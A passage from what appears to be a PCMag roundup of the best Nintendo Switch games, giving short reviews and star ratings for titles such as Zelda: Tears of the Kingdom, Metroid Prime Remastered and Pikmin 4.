franchises. It’s about Mario’s gross, evil doppelganger starting a shady game company to get rich. Fortunately for you, these “microgames” remain a pure blast of weird and wonderful bite-sized entertainment. The new gimmick here lets you and a friend tackle challenges with different characters whose unique move sets make you rethink your approach on the fly. Hurry up! Xenoblade Chronicles X: Definitive Edition 4.0 Excellent This late-period Wii U gem finally returns to close out the Nintendo Switch era. A standalone entry of the Xenoblade saga, Xenoblade Chronicles X: Definitive Edition takes place on a lush open-world planet teeming with friendly and hostile creatures. Explore on foot or, eventually, by flying a giant mech. The dynamic RPG combat rewards smart timing and synchronizing party members. Along with improved visuals, this definitive edition adds a new epilogue story. Xenoblade Chronicles X: Definitive Edition review #best #nintendo #switch #games
    ME.PCMAG.COM
    The Best Nintendo Switch Games for 2025
    (Credit: René Ramos; Nintendo; Sora)The Best Games on Every Platform Animal Crossing: New Horizons Animal Crossing: New Horizons (for Nintendo Switch) 4.0 Excellent No game may end up defining 2020 more than Animal Crossing: New Horizons. Nintendo’s adorable life simulator has always had its fans. However, with the real world under lockdown, countless players have flocked to their own virtual islands to find community. Paying a mortgage to a raccoon is a small price to pay for the freedom to relax in your own social life again. Advance Wars 1+2: Re-Boot Camp Advance Wars 1 + 2: Re-Boot Camp 4.0 Excellent Fire Emblem isn't Nintendo's only awesome strategy series. If you prefer soldiers and tanks over knights and horses, check out Advance Wars and its terrific turn-based tactics. This remake includes campaigns from the first two Game Boy Advance games, offering hours upon hours of brilliantly designed missions. You can also design your own maps and play against friends online. Advance Wars 1 + 2: Re-Boot Camp review ARMS ARMS (for Nintendo Switch) 4.0 Excellent ARMS is Nintendo's newest take on the fighting game genre. It combines cartoonish aesthetics, sci-fi weapons, and arm-stretching boxing into an accessible, offbeat fighter with a lot of variety. It's a polished, fun, competitive game that bears more than a passing visual similarity to Splatoon. Though time will tell if ARMS gains any momentum within the esports scene, the game offers plenty of opportunity to swing fists at your friends. Bayonetta 2 Bayonetta 2 (for Nintendo Switch) 4.5 Excellent Bayonetta 2 is another fantastic game that launched on the wrong system. Years later its initial release, Bayo 2 still stands as one of the best action games out there, and now that it's been ported from the Wii U to the Switch it can get the attention and devotion it deserves. Tight controls, robust challenge, and plenty of style make this stand out as a pinnacle of action games. Bayonetta 3 Bayonetta 3 (for Nintendo Switch) 4.5 Excellent Just when you thought Bayonetta couldn’t get any more bewitching, PlatinumGames delivers an absolute master class on video game action with Bayonetta 3. Besides Bayonetta’s familiar punches, kicks, and guns, you can further expand her combat options by summoning giant demons and directing their attacks. Meanwhile, the multiversal story is ridiculous, even by Bayonetta standards. Bloodstained: Ritual of the Night Bloodstained: Ritual of the Night (for Nintendo Switch) 4.0 Excellent If Bloodstained: Ritual of the Night's story of a demonic castle and a lone savior sounds incredibly familiar, it should: the game was spearheaded by Koji Igarashi, the big brain behind many revered Castlevania games. Bloodstained is an excellent Castlevania game in everything but name, hitting the same beats Symphony of the Night, Aria of Sorrow, and Order of Ecclesia did. If you're thirsty for a new, enjoyable Castlevania-like game that calls back to before Lords of Shadow rebooted the series and Mirror of Fate completely failed to capture any of its luster, this is the game for you. Bayonetta Origins: Cereza and the Lost Demon 4.0 Excellent Bayonetta Origins: Cereza and the Lost Demon isn’t a hard-hitting, nonstop action game like the main Bayonetta trilogy. Instead, this is a relatively relaxed adventure game full of puzzles and gorgeous storybook visuals. Young witch Cereza teams up with a young demon, Cheshire, to tackle challenges neither could complete alone. Although the combat isn’t quite as complex as in the mainline Bayo games, there’s still plenty of flair to the faerie fights. Bayonetta Origins: Cereza and the Lost Demon review Bravely Default II Bravely Default II (for Nintendo Switch) 4.0 Excellent Modern Final Fantasy games have become their own beasts, but games like Bravely Default II remind us why we fell in love with those classic Square Enix JRPGs. In battle, you can either perform multiple actions at once (Brave) or wait to save up for later turns (Default), which opens up many strategic possibilities. On Switch, the diorama world looks more beautiful and nostalgic than ever. Cadence of Hyrule: Crypt of the NecroDancer Cadence of Hyrule: Crypt of the NecroDancer (for Nintendo Switch) 4.0 Excellent Crypt of the NecroDancer was a surprise indie hit in 2015, catching gamers' eyes and ears with its combination of roguelike randomized dungeon exploration with rhythm game beat-keeping. It hit the Nintendo Switch in 2018, and now it's back in a new and much more Nintendo-specific form: Cadence of Hyrule: Crypt of the NecroDancer, a title that injects rhythm game mechanics into The Legend of Zelda. This Switch game seamlessly combines Zelda and Crypt of the NecroDancer, creating a surprisingly accessible and thoroughly enjoyable experience played to the beat of Zelda's classic and music. Cassette Beasts 4.0 Excellent Pokémon doesn't have a monopoly on monster catching. Cassette Beasts is a stylish, indie RPG that puts its own spin on collecting creatures and pitting them against each other in combat. The open world has many quests, the fighting mechanics have the extra depth that experienced players crave, and the story veers off in cool, surreal directions. Most importantly, there are some great monster designs, like ghostly sheep and living bullets. Cassette Beasts review Clubhouse Games: 51 Worldwide Classics Clubhouse Games: 51 Worldwide Classics (for Nintendo Switch) 4.0 Excellent Forget fancy new video games. Sometimes you just want to play chess, solitaire, or one of the other virtual vintage games that make up this classic compilation. Not only is this a convenient way to play some of history’s most enduring games with friends, but Clubhouse Games: 51 Worldwide Classics does a great job educating you on that history, including the fascinating early Hanafuda history of Nintendo itself. Game Builder Garage Game Builder Garage (for Nintendo Switch) 4.5 Excellent If you thought Super Mario Maker was a great way to learn about game development, give Game Builder Garage a spin. This incredibly powerful 3D game creation tool lets you make anything from platformers to racing games to puzzle mysteries. Thorough, friendly tutorials explain the robust “Nodon” coding language, so even novices can create hitboxes and manipulate the Z-axis like pros. Donkey Kong Country: Tropical Freeze Donkey Kong Country: Tropical Freeze (for Nintendo Switch) 4.0 Excellent The Switch has gotten a reputation as a machine for game ports, and there's nothing wrong with that. The Wii U wasn't the massive hit the Wii was, but it still had several excellent games that went underappreciated in their time. Donkey Kong Country: Tropical Freeze is one of them, a sequel to Donkey Kong Country Returns with even more challenge and variety. The Switch version of this game adds Funky Kong Mode, an easier setting and new playable character (Funky Kong himself) that makes the surprisingly brutal platforming feel a little less punishing. Hades Hades (for Nintendo Switch) Hades takes the punishing and divisive roguelike genre and masterfully twists it into one of the year's most addictive games. Fighting your way out of the Greek underworld with randomly changing skills and weapons feels incredible. The family drama at the game’s core gives you that extra narrative push to keep going. Plus, everyone is smoking hot. Indivisible Indivisible (for Nintendo Switch) While many role-playing games draw their influences from Western folklore, even RPGs made in Japan, Indivisible carves out a unique identity with a fresh Southeast Asian flavor. The 2D animation is exquisite, as we would expect from the developer of Skullgirls. Gameplay is a mix of nonlinear spaces to explore and enemies to defeat in tactical battles. Of the two types of play, the exploration sections impress us more. In these bits you find your way forward by using an axe to fling yourself up walls or by shooting arrows to blind sentries. That's just more satisfying than the frantic messes the fights, caught awkwardly between turn-based and real-time combat, can turn into.   Kirby's Return to Dream Land Deluxe Kirby’s Return to Dream Land Deluxe (for Nintendo Switch) 4.5 Excellent Kirby’s Return to Dreamland is a traditional, side-scrolling adventure compared to Kirby’s more radical outings. Still, it’s an excellent showcase of what makes even a normal Kirby game irresistible. This Deluxe version enhances the Wii co-op classic with a sweet, new art style; extra powers; and an original epilogue. Kirby’s Return to Dream Land Deluxe (for Nintendo Switch) review Kirby and the Forgotten Land Kirby and the Forgotten Land (for Nintendo Switch) 4.0 Excellent Kirby and the Forgotten Land finally gives the pink puffball the epic 3D adventure that Mario, Link, and Samus got years ago. Float through the skies in creative levels bursting with secrets. Upgrade familiar powers, such as hammers and swords, into formidable new forms. Or just sit back and marvel at how Nintendo made the post-apocalypse look so cute. Kirby Star Allies Kirby Star Allies (for Nintendo Switch) 4.0 Excellent Kirby games are always fun. Whether they're the simple platformers like Kirby's Adventure or weirdly gimmicky experiences like Kirby's Dream Course, every first-party experience with Nintendo's pink puff ball has been enjoyable. Kirby Star Allies is no different, with a lighthearted campaign filled with colorful friends and abilities, surprisingly challenging extra modes to unlock, and support for up to four players at once. Get on the Friend Train! The Legend of Zelda: Breath of the Wild The Legend of Zelda: Breath of the Wild (for Nintendo Switch) 4.5 Excellent Hyrule is in danger again, and Link must save it. That's been the theme for nearly every Legend of Zelda game, and it's still the case in The Legend of Zelda: Breath of the Wild. The series' basic premise and Link/Zelda/Ganon dynamic are present, but nearly everything else is different. The classic Zelda dungeon-exploration structure is replaced by a huge open world that's filled with destructible weapons, monsters, puzzles, and quests. Breath of the Wild's scope is one previously unseen in the Zelda series, and Nintendo executes the adventure-filled world with aplomb. The Legend of Zelda: Echoes of Wisdom The Legend of Zelda: Echoes of Wisdom - Nintendo Switch, Nintendo Switch – OLED Model, Nintendo Switch Lite 4.5 Excellent The Legend of Zelda: Echoes of Wisdom turns Nintendo's epic franchise on its head in more ways than one. Instead of the swordsman, Link, you play as Princess Zelda. Likewise, you don't directly attack enemies; you summon useful items and foes to aid you on the mission. The game takes the creative, improv spirit of Breath of the Wild and applies it to a classic 2D top-down Zelda adventure with delightful results. Plus, it just looks adorable. The Legend of Zelda: Echoes of Wisdom - Nintendo Switch, Nintendo Switch – OLED Model, Nintendo Switch Lite review The Legend of Zelda: Skyward Sword HD The Legend of Zelda: Skyward Sword HD (for Nintendo Switch) 3.5 Good No Zelda games are terrible, but no game polarizes the fan base quite like Skyward Sword. Fortunately, this HD remaster speeds up the pacing, enhances the graphics, and offers a button-based control scheme if you don’t care for motion controls. The structure feels especially linear in a post-Breath of the Wild world, but Zelda’s origin story is still worth experiencing. The Legend of Zelda: Tears of the Kingdom The Legend of Zelda: Tears of the Kingdom - Nintendo Switch, Nintendo Switch (OLED Model), Nintendo Switch Lite 5.0 Outstanding At launch, it was tough to imagine the Switch ever getting another game as good as Breath of the Wild. But years later, The Legend of Zelda: Tears of the Kingdom delivers everything we could have possibly wanted and more in this direct sequel to one of the greatest games ever made. Exploring the skies and underground caves makes Hyrule more vast than ever. New powers let you break the world apart and rebuild it as you see fit. Tears of the Kingdom is an irresistible, hypnotic adventure, and an absolute must-play for all RPG fans. The Legend of Zelda: Tears of the Kingdom - Nintendo Switch, Nintendo Switch (OLED Model), Nintendo Switch Lite review Lego Star Wars: The Skywalker Saga Lego Star Wars: The Skywalker Saga (for Nintendo Switch) 4.0 Excellent Who knows what the future holds for Star Wars, but Lego Star Wars: The Skywalker Saga provides a terrific toybox take on Episodes I-IX. The Lego recreations of all nine movies gives you plenty to experience as you blast baddies and solve Force puzzles. But what really makes this game so special is how it turns the entire Star Wars galaxy into an open world to explore, whether it’s on colorful planets or through the vastness of outer space in your trusty starfighter. Lego Star Wars: The Skywalker Saga (for Nintendo Switch) review Luigi's Mansion 3 Luigi's Mansion 3 - Nintendo Switch Standard Edition What started as a weirdly specific parody of Ghostbusters and Resident Evil has become of one the finest Mario spin-off adventures. Luigi’s spooky journey throughout a haunted hotel is arguably the most visually stunning game on the Nintendo Switch. Along with sucking up ghosts, you can now slam them (back) to death and shoot plungers to pull apart the scenery. Your greatest, and grossest, tool has to be Gooigi. This slimy green doppelgänger expands your puzzle-solving powers and provides an easy option for younger co-op partners. Lumines Remastered Lumines Remastered (for Nintendo Switch) 4.5 Excellent Puyo Puyo Tetris is great for classic, competitive block-dropping, but it's a bit overly perky and anime-ish to really relax to. Lumines Remastered is the ultimate chill-out block-dropper, syncing the mesmerizing pattern matching to dozens of hypnotic electronic and trance tracks. Load it on your Switch, put on your favorite headphones, and space out while you build huge combos. Mario & Luigi: Brothership Mario & Luigi: Brothership - Nintendo Switch, Nintendo Switch – OLED Model, Nintendo Switch Lite 4.0 Excellent Mario & Luigi: Brothership revives a Mario RPG subseries as a grand nautical adventure. The plumbers sail the seas, reconnecting scattered islands and battling foes with familiar, frenetic turn-based combat. On Nintendo Switch, the visuals and animations turn Mario and Luigi into cartoon-like characters. Mario & Luigi: Brothership - Nintendo Switch, Nintendo Switch – OLED Model, Nintendo Switch Lite review Mario + Rabbids: Kingdom Battle Mario + Rabbids: Kingdom Battle (for Nintendo Switch) 4.0 Excellent Before Minions, there were Rabbids, Ubisoft's manic, sublingual, noseless horde spawned from Rayman: Raving Rabbids. Then the weird, bug-eyed, rabbit-like creatures caused havoc in their own game series. Now, they're running around Mario's stomping grounds in Mario + Rabbids: Kingdom Battle. This strategy-RPG combines two cartoonish worlds with satisfyingly deep, XCOM-like gameplay for a very fun and strange experience. It's a combination of styles that work much, much better than you'd expect. Mario + Rabbids Sparks of Hope Mario + Rabbids Sparks of Hope (for Nintendo Switch) 4.0 Excellent Mario + Rabbids Kingdom Battle proved that these two mascots could come together for excellent, approachable tactics gameplay. Sparks of Hope is more of the same, but even better. Equipping Sparks lets you further customize your squad’s strategic abilities. Wide open levels provide entertaining exploration between the skirmishes. Mario Golf: Super Rush Mario Golf: Super Rush (for Nintendo Switch) 4.0 Excellent Leave it to Mario to find a way to make golf games feel fresh again. Mario Golf: Super Rush’s standout gimmick has golfers teeing off all at once, and then physically running across the course to take their next shot. You still have to plan smart strokes, but you also need to keep an eye on the clock. The lengthy, single-player adventure teaches you the ropes before you head online to face real challengers on the green. Mario Kart 8 Deluxe Mario Kart 8 Deluxe (for Nintendo Switch) 4.5 Excellent Mario Kart 8 stood out as the best-looking Mario Kart game yet when it came out on the Nintendo Wii U. Instead of making a new Mario Kart for the Nintendo Switch, Nintendo brought Mario Kart 8 to its new game system. In the process, Nintendo threw in both previously released DLC packs and made some few welcome changes to its multiplayer options, justifying the game's full retail price. Mario Kart 8 Deluxe is the most robust game in the series so far, and with the optional portability of the Switch, it ranks as a must-own title. Mario Strikers: Battle League Mario Strikers: Battle League (for Nintendo Switch) 4.0 Excellent Mario has played many sports throughout the years, but Mario Strikers: Battle League gives us the arcade soccer chaos fans have craved for more than a decade. It features fast-paced action, while allowing for depth and skill should you choose to push yourself. Customize your characters with stat-changing gear. Join online clubs to compete in ongoing seasons. And no one animates the Mario universe with as much style and attitude as the developers at Next Level Games. Mario Strikers: Battle League (for Nintendo Switch) review Mario Tennis Aces Mario Tennis Aces (for Nintendo Switch) 4.0 Excellent You don't need to be a sports fan to enjoy Nintendo sports games. If a sport has "Mario" in front of it, it's probably going to be a fun, very unrealistic romp instead of a serious simulation. Mario Tennis Aces is an exciting tennis game not because of any realistic physics, but because of fast, responsive gameplay and strategic mechanics that make matches feel more like rounds in a fighting game than tennis sets. Marvel vs. Capcom Fighting Collection: Arcade Classics Marvel vs. Capcom Fighting Collection: Arcade Classics - Nintendo Switch 4.0 Excellent Marvel vs. Capcom Fighting Collection: Arcade Classics lets you finally relive six legendary 2D fighters starring Marvel superheroes and Capcom icons. From the humble X-Men: Children of the Atom to the over-the-top Marvel vs. Capcom 2, this is vital fighting game history. An art gallery, modern control options, rollback netcode, and the underrated Punisher beat 'em up sweeten the deal. Marvel vs. Capcom Fighting Collection: Arcade Classics - Nintendo Switch review Metal Slug Tactics Metal Slug Tactics (for Nintendo Switch) Metal Slug Tactics trades the mainline series' fast-paced running and gunning for methodical, turn-based strategy gameplay. Still, it's just as action-packed as ever. Line up your units for devastating sync attacks. Enjoy the beautiful old-school sprite work. Plan your turns, hop into a giant tank, and obliterate foes. Metroid Dread Metroid Dread (for Nintendo Switch) 4.5 Excellent After nearly 20 years, Metroid Dread brings Samus Aran back to her 2D, bounty hunting roots for the true Metroid 5. In it, you explore a dense, dangerous new planet full of powers to pick up and enemies to eliminate. From uncompromising boss battles to terrifying chases, Dread more than lives up to its subtitle. If there's anyone strong enough to take down the terror, it's Nintendo's leading lady. Metroid Prime Remastered 5.0 Outstanding Metroid Prime is one of the best games ever made. It takes Super Metroid’s brilliant exploratory action and perfectly translates it to 3D with immaculate level design and immersive first-person shooting. This remaster, which ventures into the remake territory, includes everything that worked in the original, and ups the presentation to modern, beautiful standards. Plus, you can now play with dual-stick controls. Bring on Metroid Prime 4. Metroid Prime Remastered review Miitopia Miitopia (for Nintendo Switch) 3.5 Good Miis can do more than just play Wii Sports. In Miitopia, you use Nintendo’s cartoon caricatures to cast yourself, friends, and family as heroes and villains in a fast-paced, whimsical role-playing game. Turn yourself into a brave knight, while your buddy supports you as a pop star. The joke can’t quite sustain the whole runtime, but Miitopia is wildly entertaining.   Monster Hunter Stories 2: Wings of Ruin Monster Hunter Stories 2: Wings of Ruin (for Nintendo Switch) 4.0 Excellent If traditional Monster Hunter is just too intense for you, Monster Hunter Stories 2 lets you experience this cutthroat world as a turn-based JRPG. Befriend monsters and take them into battle. Hatch eggs to expand your menagerie. Strategic battles draw upon familiar Monster Hunter concepts. And, of course, Rathalos is here. New Pokemon Snap New Pokemon Snap (for Nintendo Switch) 4.0 Excellent The beloved Nintendo 64 spin-off finally gets the update it deserves. Instead of capturing Pokemon and forcing them to battle, New Pokemon Snap asks you to take beautiful photos of Pikachu and friends in their natural surroundings. The on-rails gameplay feels like a nonviolent version of a light gun game. The gorgeous graphics will inspire you to share your best pics online for the world to see. Nickelodeon All-Star Brawl Nickelodeon All-Star Brawl (for Nintendo Switch) 4.0 Excellent Imagine Super Smash Bros., but instead of playing as video game mascots, you control beloved cartoon characters beating each other senseless. That's Nickelodeon All-Star Brawl. From SpongeBob SquarePants to Ren and Stimpy to the Teenage Mutant Ninja Turtles, the roster covers all eras of Nicktoon nostalgia. Beyond the ironic meme potential, "Nick Smash" features genuinely fantastic gameplay made by a team clearly passionate about this particular form of "platform fighting" games. Nickelodeon All-Star Brawl (for Nintendo Switch) review Nintendo Labo Toy-Con 01 Variety Kit Nintendo Labo Toy-Con 01 Variety Kit (for Nintendo Switch) 5.0 Outstanding Labo is a weirder concept than the Switch itself. It's based around building cardboard "Toy-Cons" in which you place the Switch's components to let you do new things with them. It's also surprisingly functional, entertaining, and educational. The Nintendo Labo Variety Kit has all of the parts you need to build several different Toy-Cons like a piano and motorcycle handlebars, and walks you through every step of the process. Just building the Toy-Cons is fascinating, but the Toy-Con Garage mode adds surprisingly robust programming options to let you create your own remote-controlled creations. Nintendo Labo: VR Kit 4.5 Excellent It took over 20 years, but Nintendo finally got over its fear of virtual reality after the disastrous Virtual Boy. The Labo VR Kit lets you build your own VR headset that uses the Nintendo Switch and a set of lenses to create a stereoscopic image, and then insert that headset into different Toy-Con controllers to play a variety of games. That's already a ton of fun for $79.99 (or $39.99 for a starter set that only includes one Toy-Con to build instead of five). Add a programming environment on top that lets you create your own 3D games, and you have an impressive package. No More Heroes III No More Heroes III (for Nintendo Switch) 4.0 Excellent No More Heroes III, like the other games in Suda51’s hack-and-slash trilogy, is a punk art game. Sure, some parts may be “bad,” like the technical jank or empty open worlds. But it’s all in service of larger commentary on everything from schlocky movies to wrestling fandom to the video game industry itself. Plus, cutting aliens down to size feels legitimately fantastic, and really that’s what matters.  Penny's Big Breakaway 4.0 Excellent The creators of Sonic Mania deliver a new indie 3D platformer that feels like a forgotten Sega classic. Use your trusty yo-yo to swing and roll through colorful, tightly designed levels that test your momentum control. Bosses and other enemies are sometimes more annoying than fun, but the movement mechanics are a joy to master. Penny's Big Breakaway review Pikmin 3 Deluxe Pikmin 3 Deluxe (for Nintendo Switch) 3.5 Good Pikmin isn’t the most recognizable Nintendo franchise, but the approachable real-time strategy game carries as much magic as Mario and Zelda. This Wii U port offers more missions and ways to control your army of cute plant creatures. The campaign's local, co-op play opens all kinds of new strategies, too. Veterans of previous Pikmin wars may have seen most of this content before, but Pikmin newcomers should absolutely jump into this tiny, tactical, and tactile world. Pikmin 4 Pikmin 4 (for Nintendo Switch) 4.5 Excellent Pikmin has always been good, but the quirky real-time strategy game has never broken out of its cult status over the past 20 years. Hopefully, that all changes with Pikmin 4. The biggest and best Pikmin game yet, Pikmin 4 gives you new Pikmin to command, a cute and customizable dog companion, and many gorgeous areas to strategically explore whether above ground or in countless caves. The multiplayer could be better, but Pikmin 4 is a top-tier Nintendo game everyone should play. Pikmin 4 (for Nintendo Switch) review Pizza Tower Pizza Tower feels like a fever dream of 1990s cartoons, internet memes, and retro Wario Land games. Don’t let his pudgy exterior fool you. Protagonist Peppino Spaghetti has many incredibly fast and fluid platforming tools, including dashing and wall-running. You’ll need to master those tools to beat levels as fast as possible, without losing your mind. Pokemon Legends: Arceus Pokemon Legends: Arceus (for Nintendo Switch) 3.5 Good Pokemon Legends: Arceus finally gives the Pokemon franchise a long-awaited refresh. Taking place in the distant past of Diamond and Pearl’s Sinnoh region, Arceus lets you capture and study wild Pokemon in a world where humans still fear the creatures. Vast open fields, revamped battle mechanics, and an utterly addictive approach to exploration create the most immersive Pokemon experience yet. Pokemon Let's Go, Pikachu/Eevee! Pokemon: Let's Go, Eevee! 4.0 Excellent If the traditional Pokemon RPGs are still just a bit too complex for you, consider the casual adventures Pokemon Let's Go Pikachu and Let's Go Eevee. This duo remakes the first-generation Pokemon Yellow, with bright, colorful, HD graphics, and a new capture mechanic based on Pokemon Go. In addition, there are trainer battles and turn-based combat for people who dig classic Pokemon. Pokémon Scarlet and Violet Pokémon Scarlet - Nintendo Switch 4.0 Excellent Pokemon Sword and Shield and Pokemon Legends: Arceus experimented with expansive zones, but Pokémon Scarlet and Violet finally turns the monster-catching game into an open-world RPG. As we always suspected, the addictive Pokémon formula works brilliantly when you can go wherever you want, exploring towns and catching whatever monsters you encounter. Lingering technical issues keep it from reaching its full potential, but this is Pokémon's shining future. Pokemon Sword/Shield Pokemon Sword (for Nintendo Switch) 4.0 Excellent Pokemon Let’s Go Pikachu and Eevee were a nice warmup, but Pokemon Sword and Shield are the real home console Pokemon games we’ve been looking forward to playing. Travel across big, open landscapes to capture even bigger Pokemon. New expansions packs in 2020 give trainers even more regions to explore and more Pokemon to battle without having to buy a third version. The Pokedex will be complete before you know it.  Prince of Persia: The Lost Crown 4.5 Excellent Prince of Persia returns to its 2D roots with The Lost Crown, a standout entry in the crowded modern Metroidvania market. Everything just clicks. The massive map is a joy to explore. Clever puzzles make the most of inventive abilities. Deep combat systems allow satisfying expression. Challenging DLC further expands the adventure. And the presentation combines Persian flair with anime exuberance. Prince of Persia: The Lost Crown review Pokemon Unite Pokemon Unite (for Nintendo Switch) 3.5 Good If you’re curious about the MOBA genre, but scared of esports heavy-hitters like Dota 2 and League of Legends, then Pokemon Unite is the perfect place to get started. Two teams of five Pokemon battle each other in real-time to score goals across the map. This free-to-play game is also coming soon to mobile, so you’ll find plenty of aspiring Pokemon masters to challenge. Puyo Puyo Tetris Puyo Puyo Tetris (for Nintendo Switch) 4.5 Excellent Practically everyone in North America has heard of Tetris. Far fewer have heard of Puyo Puyo. Both are block-dropping puzzle games, but while Tetris has been Tetris for decades, Puyo Puyo has had many different tweaks and name changes in attempts to appeal to the west. It came out first as Puyo Pop, then received different licensed incarnations, such as Puzzle Fighter and Dr. Robotnik's Mean Bean Machine. Now, Puyo Puyo is making its mark here, thanks to Sega and a double-billing with Tetris. The pairing results in a title that's plump with game modes, unlockables, and solo and multiplayer options. Red Dead Redemption Red Dead Redemption (for Nintendo Switch) Grand Theft Auto put Rockstar Games on the map, but for many the team's true masterpiece is the epic, open-world Western saga known as Red Dead Redemption. John Marston's cowboy odyssey has the scathing tone you'd expect from the developer, but it also has heart and a sense of tragedy. The Nintendo Switch version perfectly maintains the original gameplay experience, from stylish shootouts to riding your horse across the empty desert. It also includes the Undead Nightmare DLC. Finally, a version of Red Dead you can play in a tent under the stars. Rebel Galaxy Outlaw Rebel Galaxy Outlaw (for Nintendo Switch) Rebel Galaxy Outlaw has enough action-packed, visually dazzling spaceship dogfights to excite any Star Fox fan. The real joy, however, is in the quieter moments, when you act out your galactic trucker fantasies by carrying cargo from space stations named after Texas towns. Improving your ship is a bit of a grind, but it’s a rewarding one. If you get bored, you can always shoot down pirates—or become one yourself. Rocket League Rocket League (for Nintendo Switch) Rocket League is soccer, with remote controlled cars and funny hats. It's amazing how compelling a game can be when the entire point of it is to use a car to knock a ball into a goal, but Rocket League nails it. Wild physics, colorful visuals, and simple game types you can keep coming back to while challenging friends and strangers make this one of the best pseudo-sports games on the Switch. Shovel Knight: Treasure Trove Shovel Knight: Treasure Trove (for Nintendo Switch) Platforming excellence comes to the Nintendo Switch courtesy of Yacht Club Games' Shovel Knight: Treasure Trove. This downloadable package includes the original Shovel Knight, one of 2014's top titles, as well as all the previously released DLC including the Plague of Shadows and Specter of Torment campaigns. If you long for some retro, 2D action, Treasure Trove a a game that you should not miss. Splatoon 3 Splatoon 3 (for Nintendo Switch) 4.0 Excellent Splatoon 3 isn't much different than Splatoon 2 (which in turn wasn't much different from Splatoon 1). However, no other online team-based shooter delivers an experience quite like this. Inking the ground, splatting opponents, and transforming from squid to kid never felt this good. The wealth of solo, cooperative, and competitive modes will keep you busy. Keep the party going with the excellent, roguelike DLC Side Order. Splatoon 3 (for Nintendo Switch) review Street Fighter 30th Anniversary Collection Street Fighter 30th Anniversary Collection (for Nintendo Switch) Street Fighter has been the biggest name in fighting games for decades, and Capcom is proud of that fact. While it really got going with Street Fighter II: The World Warrior, the Street Fighter 30th Anniversary Collection lets you play the original Street Fighter in all of its genre-building glory. And, after you realize how bad that first attempt was, you can play the much better sequels like Super Street Fighter II, Street Fighter Alpha 3, and Street Fighter III: Third Strike. You're looking at a dozen games in this collection, with loads of extra content like soundtracks and sprite data. Streets of Rage 4 Streets of Rage 4 (for Nintendo Switch) Streets of Rage 4 pounds life back into the dead sidescrolling beat ‘em up genre. The gameplay may not have progressed that much since Sega’s trilogy in the 1990s, but taking down hordes of goons with your fists has never looked better thanks to a thoroughly modern illustrated art style. A risky new mechanic that burns health to power special moves, unless you avoid getting hit, adds some fighting-game flair.  Super Bomberman R Super Bomberman R (for Nintendo Switch) 3.5 Good Bomberman's return to console gaming was one of the most surprising moments in the Nintendo's January 2017 Switch game showcase. Considering that the little guy's now the property of Konami, a company that's more known for killing P.T. and warring with Metal Gear maestro Hideo Kojima than making video games, it was shocking to see Super Bomberman R announced as a Nintendo Switch launch title. Thankfully, this newest entry in the beloved, bomb-tossing franchise keeps the series' simple and addicting core gameplay intact, and adds tons of modes, collectible items, and characters to keep things fresh. Super Mario 3D All-Stars Super Mario 3D All-Stars (for Nintendo Switch) 3.5 Good This classic Mario collection combines Super Mario 64, Super Mario Sunshine, and Super Mario Galaxy. They may not have received the radical visual overhaul of the original Super Mario All-Stars, but these are still three of the finest 3D platformers ever made—now playable in HD and on the go. Nintendo says this collection is a limited release, so get it while you can. Super Mario 3D World + Bowser's Fury Super Mario 3D World + Bowser's Fury (for Nintendo Switch) 4.5 Excellent Super Mario 3D World seamlessly blends the free-roaming, open-ended platforming of Mario 3D’s adventures with the concentrated multiplayer mayhem of his latest 2D romps. It was great on Wii U, and now it's even better on Nintendo Switch. However, this package’s real star is Bowser’s Fury, an ambitious spin-off that reimagines what an open-world Mario game can be. Super Mario Bros. Wonder Super Mario Bros. Wonder - Nintendo Switch 4.5 Excellent In the beginning, all Super Mario games were wonderful 2D sidescrollers that dazzled us with their sheer imagination. But as Mario set his sights on 3D heights, the New Super Mario Bros. series turned 2D Mario into a safe and bland nostalgia franchise. No more! Super Mario Bros. Wonder fills 2D Mario to the brim with whimsy, creativity, and joyful confusion. Turn levels into psychedelic dreamscapes! Customize your abilities! Compete against friends online! Transform into an elephant! You can do all of this and more in Super Mario Bros. Wonder. Super Mario Bros. Wonder - Nintendo Switch review Super Mario Maker 2 Super Mario Maker 2 (for Nintendo Switch) 4.5 Excellent Super Mario Maker 2 is a welcome update to the original Super Mario Maker. It adds a new skin, new themes, and plenty of new tools for making more creative and challenging Mario levels. You can create levels based on the graphics and mechanics of Super Mario Bros., Super Mario Bros. 3, Super Mario World, and New Super Mario Bros., just like in the previous Super Mario Maker. These levels can use one of 10 different themes: Ground, Sky, Underground, Forest, Underwater, Ghost House, Desert, Airship, Snow, and Castle. Sky, Forest, Desert, and Snow are new to Super Mario Maker 2. For more variety, you can toggle each theme to its nighttime variant, which adds unique twists to the gameplay. And, of course, you can share your creations online. Super Mario Odyssey Super Mario Odyssey (for Nintendo Switch) 5.0 Outstanding In Super Mario Odyssey, the heroic plumber returns to open-world game design for the first time since the incredible Super Mario 64. Though Odyssey isn't as technically groundbreaking as its predecessor, the action-platformer is packed to the brim with hat-tossing combat. Yes, hat tossing. This time around, Mario has a new friend, Cappy, who lets Mario dispatch enemies with the flick of the wrist. And, even better, Mario can assume the identity of an enemy, gaining its abilities, by plopping Cappy on the foe's head. Super Mario RPG Super Mario RPG - Nintendo Switch (OLED Model), Nintendo Switch Lite, Nintendo Switch 4.0 Excellent Forget Paper Mario or Mario and Luigi. The original Super Mario RPG, a collaboration between Nintendo and Square Enix, first showed us that Mario’s charms could translate to a Final Fantasy-style adventure. This faithful remake offers gorgeous new graphics and increased accessibility. At last, find out who Geno is. Super Mario RPG - Nintendo Switch (OLED Model), Nintendo Switch Lite, Nintendo Switch review Super Monkey Ball Banana Mania Super Monkey Ball Banana Mania (for Nintendo Switch) 4.0 Excellent Only video games can capture the simple pleasures that come from racing monkeys inside balls. Super Monkey Ball Banana Mania remasters hundreds of classic stages from Sega’s obstacle course series in a single, cool package. Don’t let the bright colors and friendly monkey faces fool you. Rolling your monkey to the goal demands an expert understanding of the game’s unforgiving physics. If you get too frustrated, take a break with Banana Mania's wacky, multiplayer mini-games. Super Smash Bros. Ultimate Super Smash Bros. Ultimate (for Nintendo Switch) 4.5 Excellent Super Smash Bros. Ultimate has everything a fan of Nintendo’s crossover mascot fighting game could want. A faster pace better for competitive play. Every single character who has ever appeared in the series, including third-party icons such as Banjo-Kazooie, Cloud Strife, and Solid Snake. There's a new single-player mode chock-full of even more fan service. The theme song even has lyrics now.  Tactics Ogre: Reborn Tactics Ogre Reborn (for Nintendo Switch) 4.0 Excellent The original Tactics Ogre enthralled fans in 1995 thanks to its deep strategy and strong narrative. If you missed out the first time, Tactics Ogre: Reborn gives you another chance to check out this lost classic, the prelude to Final Fantasy Tactics. Just don’t expect hugely revamped graphics. Telling Lies Telling Lies (for Nintendo Switch) Her Story was a test for the kind of interactive story game developer Sam Barlow could pull off with just 